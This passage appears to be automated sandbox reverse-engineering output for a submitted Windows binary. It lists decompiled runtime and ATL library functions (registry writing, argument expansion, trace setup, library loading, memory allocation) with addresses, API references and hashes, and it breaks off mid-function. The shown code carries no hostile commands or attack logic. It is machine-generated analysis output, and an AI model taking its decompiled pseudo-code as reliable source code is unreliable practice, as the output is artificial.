                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$Subclassing through a hook discarded.$pThis != 0
                      • API String ID: 2445389785-534117427
                      • Opcode ID: 419172df3f8a17134e0be11cb423394f763dfd1b74305a28a729308d6d5bb22b
                      • Instruction ID: e6068c050bfd5d20ec7e7a9db860da6c41587950dcfb983a15f89a87c9c60fbf
                      • Opcode Fuzzy Hash: 419172df3f8a17134e0be11cb423394f763dfd1b74305a28a729308d6d5bb22b
                      • Instruction Fuzzy Hash: 843161B1E41208BFCB44EFA8C952FAEB7B4AF88705F108559FA05A7281D6745F40CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944840 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 69%
                      			E00944840(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
				void** _v8;
				int _v12;
				int _v16;
				void* _t22;
				long _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t41;
				void* _t42;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t44 =  *_v8;
					if( *_v8 == 0) {
						_t31 = L00994930(_t44, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1877, 0, "%ls", L"m_hKey != 0");
						_t42 = _t42 + 0x18;
						if(_t31 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				L5:
				L5:
				if(_a8 == 0) {
					_v16 = 0;
				} else {
					_v16 = 1;
				}
				_v12 = _v16;
				_t48 = _v12;
				if(_v12 == 0) {
					_t30 = L00994930(_t48, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1878, 0, "%ls", L"__atl_condVal");
					_t42 = _t42 + 0x18;
					if(_t30 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					goto L13;
				}
				_t27 = 0xd;
				L19:
				return E009D1520(_t27, _t41 - _t42 + 0xc);
				L13:
				__eflags = 0;
				if(0 != 0) {
					goto L5;
				}
				__eflags = _a12 - 1;
				if(_a12 != 1) {
					__eflags = _a12 - 2;
					if(__eflags != 0) {
						_t29 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1879, 0, "%ls", L"(dwType == ( 1ul )) || (dwType == ( 2ul ))");
						_t42 = _t42 + 0x18;
						__eflags = _t29 - 1;
						if(_t29 == 1) {
							asm("int3");
						}
					}
				}
				_t22 = E00992E00(_a8);
				_t42 = _t42 + 4;
				_t26 = RegSetValueExA( *_v8, _a4, 0, _a12, _a8, _t22 + 1);
				__eflags = _t42 - _t42;
				_t27 = E009D1520(_t26, __eflags);
				goto L19;
			}














                      0x00944847
                      0x0094484e
                      0x00944855
                      0x0094485c
                      0x0094485f
                      0x00944862
                      0x00944865
                      0x0094487f
                      0x00944884
                      0x0094488a
                      0x0094488c
                      0x0094488c
                      0x0094488a
                      0x0094488d
                      0x00000000
                      0x00944891
                      0x00944895
                      0x009448a0
                      0x00944897
                      0x00944897
                      0x00944897
                      0x009448aa
                      0x009448ad
                      0x009448b1
                      0x009448cb
                      0x009448d0
                      0x009448d6
                      0x009448d8
                      0x009448d8
                      0x009448d6
                      0x009448dd
                      0x00000000
                      0x00000000
                      0x009448df
                      0x00944950
                      0x0094495d
                      0x009448e6
                      0x009448e6
                      0x009448e8
                      0x00000000
                      0x00000000
                      0x009448ea
                      0x009448ee
                      0x009448f0
                      0x009448f4
                      0x0094490e
                      0x00944913
                      0x00944916
                      0x00944919
                      0x0094491b
                      0x0094491b
                      0x00944919
                      0x009448f4
                      0x00944920
                      0x00944925
                      0x00944942
                      0x00944948
                      0x0094494a
                      0x00000000

                      APIs
                      • _strlen.LIBCMT ref: 00944920
                      • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,00000000,-00000001), ref: 00944942
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$(dwType == ( 1ul )) || (dwType == ( 2ul ))$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-2957920586
                      • Opcode ID: 9b4260fb354b93a43c2bde936a427d8bab0d70f0fb65da220f3b64620c081e3c
                      • Instruction ID: 286dfcd59674c16488d759d7dc94cb7a1bbf0f750bcd215694210a3d8cb16703
                      • Opcode Fuzzy Hash: 9b4260fb354b93a43c2bde936a427d8bab0d70f0fb65da220f3b64620c081e3c
                      • Instruction Fuzzy Hash: 2031EA71E84308BBDF24DF98DC47FAE7368AB90B08F248555F6046A3C1E6B59B50CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AD8A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 91COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009AD8A0(signed int __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				void* _t35;
				void* _t38;
				signed int _t55;
				void* _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t55 = __ecx;
				_t35 = E00994020( &_a4);
				_t76 = _t75 + 4;
				_v16 = _t35 + 1;
				if(_v16 <= (_t55 | 0xffffffff) - _a12) {
					_v12 = _a12 + _v16 + 1;
					_t38 = L009992C0(_a12 + _v16 + 1, __edi, _v12, 1, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x98);
					_t77 = _t76 + 0x14;
					L0095BF60( &_v8, _t38);
					if(_a12 > 0) {
						_v20 = E0095C0C0( &_v8);
						E00994A20(E009AE240( &_v20,  &_v12,  &_a8,  &_a12), _t52, L"traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x9c, 0);
						_t77 = _t77 + 0x28;
					}
					_v24 = _v12 - _a12;
					_v28 = E0095C0C0( &_v8) + _a12;
					E00994A20(E009AE270( &_v28,  &_v24,  &_a4,  &_v16), _t43, L"traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0xa3, 0);
					_v32 = E009AE8C0(_a16, _t74, E0099C129( &_v8));
					E0095BFA0( &_v8);
					return _v32;
				}
				return 0xc;
			}
















                      0x009ad8a0
                      0x009ad8a0
                      0x009ad8ac
                      0x009ad8b1
                      0x009ad8b7
                      0x009ad8c3
                      0x009ad8d9
                      0x009ad8ee
                      0x009ad8f3
                      0x009ad8fa
                      0x009ad903
                      0x009ad90d
                      0x009ad93f
                      0x009ad944
                      0x009ad944
                      0x009ad94d
                      0x009ad95b
                      0x009ad98d
                      0x009ad9a6
                      0x009ad9ac
                      0x00000000
                      0x009ad9b1
                      0x00000000

                      APIs
                        • Part of subcall function 00994020: _strlen.LIBCMT ref: 0099402B
                      • __invoke_watson_if_error.LIBCMTD ref: 009AD93F
                      • __invoke_watson_if_error.LIBCMTD ref: 009AD98D
                      Strings
                      • traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length), xrefs: 009AD921
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 009AD917, 009AD965
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 009AD8E1
                      • traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count), xrefs: 009AD96F
                      • copy_and_add_argument_to_buffer, xrefs: 009AD91C, 009AD96A
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __invoke_watson_if_error$_strlen
                      • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                      • API String ID: 4131775925-1477255430
                      • Opcode ID: 4d8aa4fa39f3280e4e52a248fccbc90c48155affed8d967a18ffa9f0712146f1
                      • Instruction ID: 9755985ac9dcbddab0a419ed50c417154bb9c5c049c66f3c23dc1f9bee7f28a4
                      • Opcode Fuzzy Hash: 4d8aa4fa39f3280e4e52a248fccbc90c48155affed8d967a18ffa9f0712146f1
                      • Instruction Fuzzy Hash: A73163B6D40209BBCF01EFA4DC82FEF7738AB90309F004559B91166282E774AB14CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009421A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 75COMMON
                      Download Yara Rule
                      C-Code - Quality: 30%
                      			E009421A0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v268;
				char _v272;
				signed int _t14;
				signed int _t15;
				void* _t23;
				void* _t26;
				void* _t34;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				signed int _t44;
				void* _t45;
				void* _t46;

				_t43 = __esi;
				_t34 = __edx;
				_t26 = __ebx;
				_t41 =  &_v272;
				memset(_t41, 0xcccccccc, 0x43 << 2);
				_t46 = _t45 + 0xc;
				_t42 = _t41 + 0x43;
				_t14 =  *0xa0600c; // 0x5d529087
				_t15 = _t14 ^ _t44;
				_v8 = _t15;
				if(_a4 != 0) {
					__eflags =  *0xb33670 - 0x20;
					if( *0xb33670 < 0x20) {
						 *((intOrPtr*)(0xb315f0 +  *0xb33670 * 0x104)) = _a8;
						E0095AF80(_t42,  &_v268, 0, 0x100);
						E00941490(__eflags,  &_v268, 0x7f, L"%hs", _a4);
						_t34 = 0xb315f4 +  *0xb33670 * 0x104;
						E00992600(_t34, 0x7f,  &_v268);
						_t46 = _t46 + 0x28;
						_t15 =  *0xb33670 + 1;
						__eflags = _t15;
						 *0xb33670 = _t15;
					} else {
						_t15 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t15 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltrace.h", 0x151, 0, "%ls", L"false && \"Too many categories defined\"");
							_t46 = _t46 + 0x18;
							__eflags = 0 - 1;
							if(0 == 1) {
								asm("int3");
							}
						}
					}
				}
				E009D14C0(_t44, 0x9422a8);
				_t23 = _t15;
				_t39 = _t34;
				return E009D1520(E00957280(_t23, _t26, _v8 ^ _t44, _t39, _t42, _t43), _t44 - _t46 + 0x10c);
			}


















                      0x009421a0
                      0x009421a0
                      0x009421a0
                      0x009421aa
                      0x009421ba
                      0x009421ba
                      0x009421ba
                      0x009421bc
                      0x009421c1
                      0x009421c3
                      0x009421ca
                      0x009421d1
                      0x009421d8
                      0x00942213
                      0x00942227
                      0x00942241
                      0x0094225c
                      0x00942263
                      0x00942268
                      0x00942270
                      0x00942270
                      0x00942273
                      0x009421da
                      0x009421da
                      0x009421da
                      0x009421dc
                      0x009421f6
                      0x009421fb
                      0x009421fe
                      0x00942201
                      0x00942203
                      0x00942203
                      0x00942201
                      0x00942204
                      0x009421d8
                      0x00942282
                      0x00942287
                      0x00942288
                      0x009422a4

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00942282
                      Strings
                      • %ls, xrefs: 009421E3
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h, xrefs: 009421EF
                      • atlTraceGeneral, xrefs: 0094225C
                      • %hs, xrefs: 00942233
                      • false && "Too many categories defined", xrefs: 009421DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %hs$%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltrace.h$atlTraceGeneral$false && "Too many categories defined"
                      • API String ID: 930174750-274957755
                      • Opcode ID: 2403d3c4f7fe0f73469957f26093c24ab9a9c6d00d4a9751bb5fa516ab2357ad
                      • Instruction ID: 21106b7329bca6bd5730b24deb321023062d1f19263dcdc1f2cd6192742f3c4a
                      • Opcode Fuzzy Hash: 2403d3c4f7fe0f73469957f26093c24ab9a9c6d00d4a9751bb5fa516ab2357ad
                      • Instruction Fuzzy Hash: BB214C76A08208BFDB14DB24EC43FB97368F7D4708F504215FA055B2D2EBF4A6848B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A3670 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009A3670(void* __ecx, WCHAR* _a4) {
				struct HINSTANCE__* _v8;

				_v8 = LoadLibraryExW(_a4, 0, 0x800);
				if(_v8 == 0) {
					if(GetLastError() != 0x57 || E009A2BC0(_a4, L"api-ms-", 7) == 0 || E009A2BC0(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					} else {
						return LoadLibraryExW(_a4, 0, 0);
					}
				}
				return _v8;
			}




                      0x009a3687
                      0x009a368e
                      0x009a369e
                      0x00000000
                      0x009a36ce
                      0x00000000
                      0x009a36d6
                      0x009a369e
                      0x00000000

                      APIs
                      • LoadLibraryExW.KERNEL32(009A3569,00000000,00000800,?,?,009A3569,00000000), ref: 009A3681
                      • GetLastError.KERNEL32(?,?,009A3569), ref: 009A3695
                      • _wcsncmp.LIBCMTD ref: 009A36AB
                      • _wcsncmp.LIBCMTD ref: 009A36C2
                      • LoadLibraryExW.KERNEL32(009A3569,00000000,00000000,?,?,?,?,009A3569), ref: 009A36D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: LibraryLoad_wcsncmp$ErrorLast
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 180994465-537541572
                      • Opcode ID: c817df3d2a0f8530bbcb99a5427e6a5984edece15b42e3b5d32d09103d1bd4ed
                      • Instruction ID: 29ed31532d0a043f111fad0ebcc28c07876b4d51645a902e0277728f9dbbc97e
                      • Opcode Fuzzy Hash: c817df3d2a0f8530bbcb99a5427e6a5984edece15b42e3b5d32d09103d1bd4ed
                      • Instruction Fuzzy Hash: 2601A471B44208F7DB109FA2DD0BF5A3768AB46784F208410F9089A281EE75DF4097E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009569E3 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 62%
                      			E009569E3(void* __edi) {
				intOrPtr _t2;
				void* _t6;
				void* _t12;
				void* _t15;
				void _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t20;

				_t15 = __edi;
				_t2 =  *0xb30208; // 0x0
				if(_t2 != 0) {
					L3:
					if(_t2 != 1) {
						__imp__InterlockedPopEntrySList(_t2);
						_t19 = _t2;
						if(_t19 == 0) {
							_t20 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
							if(_t20 != 0) {
								__imp__InterlockedPopEntrySList( *0xb30208, _t15);
								_t16 =  *_t20;
								if(_t16 == 0) {
									_t1 = _t20 + 0xff0; // 0xff0
									_t17 = _t1;
									do {
										__imp__InterlockedPushEntrySList( *0xb30208, _t20);
										_t20 = _t20 + 0x10;
									} while (_t20 < _t17);
									_t6 = _t20;
									L15:
									return _t6;
								}
								VirtualFree(_t20, 0, 0x8000);
								_t6 = _t16;
								goto L15;
							}
							L9:
							RaiseException(0xc0000017, 0, 0, 0);
							return 0;
						}
						E0095AF80(_t15, _t19, 0, 0xd);
						return _t19;
					}
					_t12 = HeapAlloc(GetProcessHeap(), 8, 0xd);
					if(_t12 == 0) {
						goto L9;
					}
					return _t12;
				}
				if(E00956AF9() == 0) {
					goto L9;
				}
				_t2 =  *0xb30208; // 0x0
				goto L3;
			}











                      0x009569e3
                      0x009569e3
                      0x009569ee
                      0x009569fe
                      0x00956a01
                      0x00956a1e
                      0x00956a24
                      0x00956a28
                      0x00956a4b
                      0x00956a4f
                      0x00956a6c
                      0x00956a72
                      0x00956a76
                      0x00956a89
                      0x00956a89
                      0x00956a8f
                      0x00956a96
                      0x00956a9c
                      0x00956a9f
                      0x00956aa3
                      0x00956aa5
                      0x00000000
                      0x00956aa5
                      0x00956a7f
                      0x00956a85
                      0x00000000
                      0x00956a85
                      0x00956a51
                      0x00956a59
                      0x00000000
                      0x00956a5f
                      0x00956a2f
                      0x00000000
                      0x00956a37
                      0x00956a0e
                      0x00956a16
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00956a16
                      0x009569f7
                      0x00000000
                      0x00000000
                      0x009569f9
                      0x00000000

                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A07
                      • HeapAlloc.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956A0E
                        • Part of subcall function 00956AF9: IsProcessorFeaturePresent.KERNEL32(0000000C,009569F5,00000000,?,00956BAD,?,?,00944CBB), ref: 00956AFB
                      • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A1E
                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00956BAD,?,?,00944CBB), ref: 00956A45
                      • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956A59
                      • InterlockedPopEntrySList.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956A6C
                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00956BAD,?,?,00944CBB), ref: 00956A7F
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                      • String ID:
                      • API String ID: 2460949444-0
                      • Opcode ID: 1333d076ef96dd24b72f66827deff395cb3becf2139b2d0b75b1e656f717d598
                      • Instruction ID: 801708e8e2680acea2b0a51f939822e0bf60fb9f8e1dc3ce573d37d21b9a07f3
                      • Opcode Fuzzy Hash: 1333d076ef96dd24b72f66827deff395cb3becf2139b2d0b75b1e656f717d598
                      • Instruction Fuzzy Hash: 1A110475689611BBEB21DF6AAC48F2B771CAF44782F908422FD11F7151DB20DC889BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095FD40 Relevance: 12.1, APIs: 8, Instructions: 51COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0095FD40(intOrPtr __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = __ecx;
				if(E0096A6C0(_v8) != 0) {
					if(E0096A560(_v8) == 0) {
						if(E0096A560(_a4) == 0) {
							E0095E8C0(_v8,  *_a4);
						} else {
							_v12 = E0096AB70(_a4);
							if(_v12 != 0) {
								L0095FF10(_v8, _v12);
							}
						}
					} else {
						if(E0096A560(_a4) == 0) {
							E0095F820(_v8, _a4);
						} else {
							E0095F920(_v8, E0096AB70(_a4));
						}
					}
				}
				return _v8;
			}





                      0x0095fd46
                      0x0095fd53
                      0x0095fd5f
                      0x0095fd98
                      0x0095fdc4
                      0x0095fd9a
                      0x0095fda2
                      0x0095fda9
                      0x0095fdb4
                      0x0095fdb4
                      0x0095fdb9
                      0x0095fd61
                      0x0095fd6b
                      0x0095fd87
                      0x0095fd6d
                      0x0095fd79
                      0x0095fd79
                      0x0095fd8c
                      0x0095fd5f
                      0x0095fdcf

                      APIs
                      • DName::isValid.LIBCMTD ref: 0095FD4C
                      • DName::isEmpty.LIBCMTD ref: 0095FD58
                      • DName::isEmpty.LIBCMTD ref: 0095FD64
                      • DName::operator=.LIBVCRUNTIMED ref: 0095FD79
                        • Part of subcall function 0095F920: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F957
                      • Mailbox.LIBCMTD ref: 0095FD87
                      • DName::isEmpty.LIBCMTD ref: 0095FD91
                      • DName::operator+=.LIBCMTD ref: 0095FDB4
                        • Part of subcall function 0095FF10: DName::isValid.LIBCMTD ref: 0095FF1A
                        • Part of subcall function 0095FF10: DName::isEmpty.LIBCMTD ref: 0095FF26
                        • Part of subcall function 0095FF10: DName::operator=.LIBVCRUNTIMED ref: 0095FF42
                      • DName::append.LIBCMTD ref: 0095FDC4
                        • Part of subcall function 0095E8C0: pairNode::pairNode.LIBCMTD ref: 0095E8F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
                      • String ID:
                      • API String ID: 1694665504-0
                      • Opcode ID: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction ID: 8fcb7fc3b4a47c6ffdbdca4d79617fd96c653ff58d8bc0d04c86f5eb3e458d48
                      • Opcode Fuzzy Hash: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction Fuzzy Hash: 1611D23560010CEBCB04FFA6D9A2AAD7B79AF84351F104476BD06AB295DF30AE44DF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096D580 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 250timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E0096D580(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				signed int _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t127;
				void* _t135;
				signed int _t147;
				void* _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t228;
				void* _t229;
				signed int _t233;
				void* _t234;

				_t229 = __esi;
				_t228 = __edi;
				_t173 = __ecx;
				_t172 = __ebx;
				_t231 = _t233;
				_t234 = _t233 - 0x4c8;
				_t127 =  *0xa0600c; // 0x5d529087
				_v8 = _t127 ^ _t233;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t239 = _v1148;
				if(_v1148 == 0) {
